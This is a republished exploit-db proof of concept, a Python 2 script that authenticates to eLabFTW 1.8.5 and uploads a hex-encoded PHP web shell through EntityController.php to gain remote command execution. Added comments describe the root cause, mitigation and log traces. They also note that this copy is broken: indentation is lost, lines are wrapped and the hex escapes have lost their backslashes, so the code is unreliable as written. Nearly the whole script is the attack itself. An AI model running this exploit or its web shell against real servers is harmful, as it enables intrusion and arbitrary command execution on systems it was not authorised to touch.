
Published on May 21st, 2019 📆 | 6513 Views ⚑


eLabFTW 1.8.5 – Arbitrary File Upload / Remote Code Execution



#!/usr/bin/env python
#
# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary
#                         File Upload / RCE
# Date                  : 5/18/19
# Exploit Author        : liquidsky (JMcPeters)
# Vulnerable Software   : eLabFTW 1.8.5
# Vendor Homepage       : https://www.elabftw.net/
# Version               : 1.8.5
# Software Link         : https://github.com/elabftw/elabftw
# Tested On             : Linux / PHP Version 7.0.33 / Default
#                         installation (Softaculous)
# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
#
# Greetz : wetw0rk, offsec ^^
#
# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads
#   via the /app/controllers/EntityController.php component.
# This may result in remote command execution. An attacker can use a
#   user account to fully compromise the system using a POST request.
# This will allow for PHP files to be written to the web root, and for
#   code to execute on the remote server.
#
# Notes: Once this is done a php shell will drop at https://[target
#   site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long
#   alphanumeric].php5?e=whoami
# You will have to visit the uploads directory on the site to see what
#   the name is. However there is no protection against directory listing.
# So this can be done by an attacker remotely.
#
# Review notes (defensive reading of this PoC):
#   - Root cause, as the advisory above describes it: the upload handler
#     behind app/controllers/EntityController.php keeps a user-supplied
#     filename/extension and stores the file under the web-served
#     uploads/ directory, so a .php5 file is written where PHP runs it.
#     Exploitation requires an authenticated (ordinary) user account.
#   - Mitigation: apply the vendor's fix for this issue; additionally,
#     serve uploads/ with script execution disabled (or from outside the
#     document root), enforce an allow-list of non-executable extensions
#     server-side, and disable directory listing on uploads/ (the notes
#     above rely on the listing to locate the dropped file).
#   - Detection: an authenticated multipart/form-data POST to
#     app/controllers/EntityController.php whose file part carries a
#     .php5 (or other PHP-executable) filename, followed by GET requests
#     to uploads/<dir>/<long hex name>.php5 with a query string, is the
#     trace this script leaves in web-server logs.
#   - This is a Python 2 script (print statements). In this copy the
#     try/except body has lost its indentation and several long lines
#     are wrapped mid-statement, so it does not parse as written.

import requests
from bs4 import BeautifulSoup as bs4
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import sys
import time

# Banner.
print "+-------------------------------------------------------------+"
print
print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE"
print
print "-          Discovery / PoC by liquidsky (JMcPeters) ^^"
print
print "+-------------------------------------------------------------+"

# Positional arguments: target host, login e-mail, password and the
# eLabFTW install directory (path component under the web root).
# Any missing argument raises IndexError and prints the usage text.
try:

target = sys.argv[1]
email = sys.argv[2]
password = sys.argv[3]
directory = sys.argv[4]

except IndexError:

        print
print "- Usage: %s    " % sys.argv[0]
print "- Example: %s incidentsecurity.com user@email.com mypassword
elabftw" % sys.argv[0]
        print
sys.exit()


# Every request below is routed through a local intercepting proxy on
# 127.0.0.1:8080; together with verify=False this means TLS certificate
# validation is off for the whole run.
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# The payload to send: a multipart/form-data body, hex-encoded
# (the '\x' escapes appear to have lost their backslashes in this copy).
# It carries the fixed form fields the upload endpoint expects followed
# by one file part whose filename ends in .php5 and whose content is the
# PHP web shell referred to in the notes above. The multipart boundary
# embedded here must match the one in the Content-Type header below.
data = ""
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37"
data += "x32x31x36x37x35x39x38x31x31x30x38x37x34x35x39"
data += "x34x31x31x31x36x33x30x33x39x35x30x37x37x0dx0a"
data += "x43x6fx6ex74x65x6ex74x2dx44x69x73x70x6fx73x69"
data += "x74x69x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61"
data += "x3bx20x6ex61x6dx65x3dx22x75x70x6cx6fx61x64x22"
data += "x0dx0ax0dx0ax74x72x75x65x0dx0ax2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31x36x37x35"
data += "x39x38x31x31x30x38x37x34x35x39x34x31x31x31x36"
data += "x33x30x33x39x35x30x37x37x0dx0ax43x6fx6ex74x65"
data += "x6ex74x2dx44x69x73x70x6fx73x69x74x69x6fx6ex3a"
data += "x20x66x6fx72x6dx2dx64x61x74x61x3bx20x6ex61x6d"
data += "x65x3dx22x69x64x22x0dx0ax0dx0ax34x0dx0ax2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31"
data += "x36x37x35x39x38x31x31x30x38x37x34x35x39x34x31"
data += "x31x31x36x33x30x33x39x35x30x37x37x0dx0ax43x6f"
data += "x6ex74x65x6ex74x2dx44x69x73x70x6fx73x69x74x69"
data += "x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61x3bx20"
data += "x6ex61x6dx65x3dx22x74x79x70x65x22x0dx0ax0dx0a"
data += "x65x78x70x65x72x69x6dx65x6ex74x73x0dx0ax2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31"
data += "x36x37x35x39x38x31x31x30x38x37x34x35x39x34x31"
data += "x31x31x36x33x30x33x39x35x30x37x37x0dx0ax43x6f"
data += "x6ex74x65x6ex74x2dx44x69x73x70x6fx73x69x74x69"
data += "x6fx6ex3ax20x66x6fx72x6dx2dx64x61x74x61x3bx20"
data += "x6ex61x6dx65x3dx22x66x69x6cx65x22x3bx20x66x69"
data += "x6cx65x6ex61x6dx65x3dx22x70x6fx63x33x2ex70x68"
data += "x70x35x22x0dx0ax43x6fx6ex74x65x6ex74x2dx54x79"
data += "x70x65x3ax20x61x70x70x6cx69x63x61x74x69x6fx6e"
data += "x2fx78x2dx70x68x70x0dx0ax0dx0ax3cx3fx70x68x70"
data += "x20x65x63x68x6fx20x73x68x65x6cx6cx5fx65x78x65"
data += "x63x28x24x5fx47x45x54x5bx27x65x27x5dx2ex27x20"
data += "x32x3ex26x31x27x29x3bx20x3fx3ex0dx0ax2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
data += "x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx37x32x31x36"
data += "x37x35x39x38x31x31x30x38x37x34x35x39x34x31x31"
data += "x31x36x33x30x33x39x35x30x37x37x2dx2dx0dx0a"

# One session so the cookies set by the login response are reused.
s = requests.Session()

# Step 1: fetch the login page (TLS verification disabled).
print "[*] Visiting eLabFTW Site"
r = s.get('https://' + target + '/' + directory +
'/login.php',verify=False, proxies=proxies)
print "[x]"

# Grabbing token: the value of the hidden 'formkey' input on the login
# form (presumably eLabFTW's form/CSRF token). It is reused both as the
# 'formkey' login field and as the 'token' cookie in the upload request.
# Raises TypeError if the input is not present in the page.
html_bytes = r.text
soup = bs4(html_bytes, 'lxml')
token = soup.find('input', {'name':'formkey'})['value']

values = {'email': email,
          'password': password,
          'formkey': token,}

time.sleep(2)

# Step 2: authenticate. The response is never inspected; the success
# message below is printed unconditionally, so a failed login is only
# noticed when the PHPSESSID lookup (or the upload) fails later.
print "[*] Logging in to eLabFTW"

r = s.post('https://' + target + '/' + directory +
'/app/controllers/LoginController.php', data=values, verify=False,
proxies=proxies)

print "[x] Logged in :)"

time.sleep(2)

# Session cookie issued during login; KeyError if it was never set.
sessionId = s.cookies['PHPSESSID']

# Headers hand-copied from an intercepted browser upload request.
# Note: Content-Length is hard-coded rather than computed from `data`,
# and Cookie is assembled by hand instead of relying on the session jar.
headers = {
    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
    #Host: incidentsecurity.com
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0)
Gecko/20100101 Firefox/52.0",
    "Accept": "application/json",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    #Referer: https://incidentsecurity.com
    "Cache-Control": "no-cache",
    "X-Requested-With": "XMLHttpRequest",
    "Content-Length": "588",
    "Content-Type": "multipart/form-data;
boundary=---------------------------72167598110874594111630395077",
    "Connection": "close",
    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
}

# Step 3: POST the multipart body to the upload controller. The response
# is not checked either; the operator is told to browse the uploads/
# directory listing to learn the server-assigned file name.
print "[*] Sending payload..."
r = s.post('https://' + target + '/' + directory +
'/app/controllers/EntityController.php',verify=False, headers=headers,
data=data, proxies=proxies)
print "[x] Payload sent"
print
print "Now check https://%s/%s/uploads" % (target, directory)
print "Your php shell will be there under a random name (.php5)"
print
print "i.e https://[vulnerable
site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"
            





https://www.exploit-db.com/exploits/46869
